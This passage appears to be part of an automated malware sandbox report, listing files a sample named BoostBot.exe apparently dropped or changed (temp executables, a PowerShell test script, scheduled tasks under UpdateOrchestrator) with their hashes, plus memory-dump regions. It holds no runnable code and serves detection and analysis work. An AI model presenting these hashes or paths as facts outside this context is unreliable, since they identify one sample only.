                                                                                                                            b995d2c1a807019dd476440da655930794fc31568d6698c4d639124f913d7036

                                                                                                                            SHA512

                                                                                                                            fa8fb2b9742df08cf7e94bcec67a8dc29a8c740b3ed347eb20e8f56b92ab5f1cb784ee96630fb6abfa9b842f98521dc0e0ae98a09b372b6dc85e72f3301f164e

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                            Filesize

                                                                                                                            330B

                                                                                                                            MD5

                                                                                                                            fb4d66fd549f6f28c4d18badc699cba8

                                                                                                                            SHA1

                                                                                                                            71f02763a3938c4908cba62ce7d1d8c0923bdbc3

                                                                                                                            SHA256

                                                                                                                            db4a86c14945ba4ed87af8a045c8651cb41a7fcb8f7a26cbd4a0c6e1e5ed0380

                                                                                                                            SHA512

                                                                                                                            bcd84d936042e3ccbf8a438f8bc853e17b9d3bd6993a1cf2f20000a2503ca8d1a5af04641a2a96f2b1599d2f846923dcf1c396fdc5a63050fc16c29e0d6d04fe

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                                            Filesize

                                                                                                                            409KB

                                                                                                                            MD5

                                                                                                                            404ab800bbe49c36bd64d0d73600b59a

                                                                                                                            SHA1

                                                                                                                            4c8dff2702fada108f7477ad357067310b584366

                                                                                                                            SHA256

                                                                                                                            5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                                            SHA512

                                                                                                                            d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdcw0na2.2el.ps1

                                                                                                                            Filesize

                                                                                                                            60B

                                                                                                                            MD5

                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                            SHA1

                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                            SHA256

                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                            SHA512

                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                            Filesize

                                                                                                                            162KB

                                                                                                                            MD5

                                                                                                                            152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                            SHA1

                                                                                                                            c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                            SHA256

                                                                                                                            a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                            SHA512

                                                                                                                            2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                            SHA1

                                                                                                                            98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                            SHA256

                                                                                                                            ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                            SHA512

                                                                                                                            c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            f313c5b4f95605026428425586317353

                                                                                                                            SHA1

                                                                                                                            06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                            SHA256

                                                                                                                            129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                            SHA512

                                                                                                                            b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                            SHA1

                                                                                                                            a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                            SHA256

                                                                                                                            98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                            SHA512

                                                                                                                            1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                            SHA1

                                                                                                                            63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                            SHA256

                                                                                                                            727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                            SHA512

                                                                                                                            f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                            SHA1

                                                                                                                            5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                            SHA256

                                                                                                                            55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                            SHA512

                                                                                                                            5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            0b990e24f1e839462c0ac35fef1d119e

                                                                                                                            SHA1

                                                                                                                            9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                            SHA256

                                                                                                                            a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                            SHA512

                                                                                                                            c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                          • memory/376-105-0x0000015213400000-0x000001521342B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/376-111-0x0000015213400000-0x000001521342B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/376-112-0x00007FF8FECB0000-0x00007FF8FECC0000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/528-116-0x000002132FE60000-0x000002132FE8B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/608-79-0x00007FF8FECB0000-0x00007FF8FECC0000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/608-70-0x000002827D4E0000-0x000002827D505000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            148KB

                                                                                                                          • memory/608-71-0x000002827D8D0000-0x000002827D8FB000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/608-72-0x000002827D8D0000-0x000002827D8FB000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/608-78-0x000002827D8D0000-0x000002827D8FB000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/672-83-0x00000164D9630000-0x00000164D965B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/672-90-0x00007FF8FECB0000-0x00007FF8FECC0000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/672-89-0x00000164D9630000-0x00000164D965B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/756-32-0x00000000060D0000-0x000000000610C000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            240KB

                                                                                                                          • memory/756-27-0x0000000000420000-0x000000000048C000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            432KB

                                                                                                                          • memory/756-28-0x0000000005560000-0x0000000005B04000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/756-29-0x0000000004EE0000-0x0000000004F72000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            584KB

                                                                                                                          • memory/756-30-0x0000000004E40000-0x0000000004EA6000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            408KB

                                                                                                                          • memory/756-31-0x0000000005170000-0x0000000005182000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            72KB

                                                                                                                          • memory/964-94-0x000001D2FF9F0000-0x000001D2FFA1B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/964-101-0x00007FF8FECB0000-0x00007FF8FECC0000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/964-100-0x000001D2FF9F0000-0x000001D2FFA1B000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/1504-58-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1504-63-0x00007FF93EC30000-0x00007FF93EE25000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/1504-60-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1504-59-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1504-67-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1504-64-0x00007FF93D290000-0x00007FF93D34E000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            760KB

                                                                                                                          • memory/1504-57-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1504-62-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1664-26-0x00007FF91FEE0000-0x00007FF9209A1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1664-9-0x00007FF91FEE3000-0x00007FF91FEE5000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/1664-21-0x00007FF91FEE0000-0x00007FF9209A1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1664-20-0x00007FF91FEE0000-0x00007FF9209A1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1664-19-0x0000017A77CD0000-0x0000017A77CF2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/3644-39-0x00000000069E0000-0x00000000069EA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            40KB

                                                                                                                          • memory/4208-54-0x000001C6F6AA0000-0x000001C6F6ACA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/4208-56-0x00007FF93D290000-0x00007FF93D34E000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            760KB

                                                                                                                          • memory/4208-55-0x00007FF93EC30000-0x00007FF93EE25000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.0MB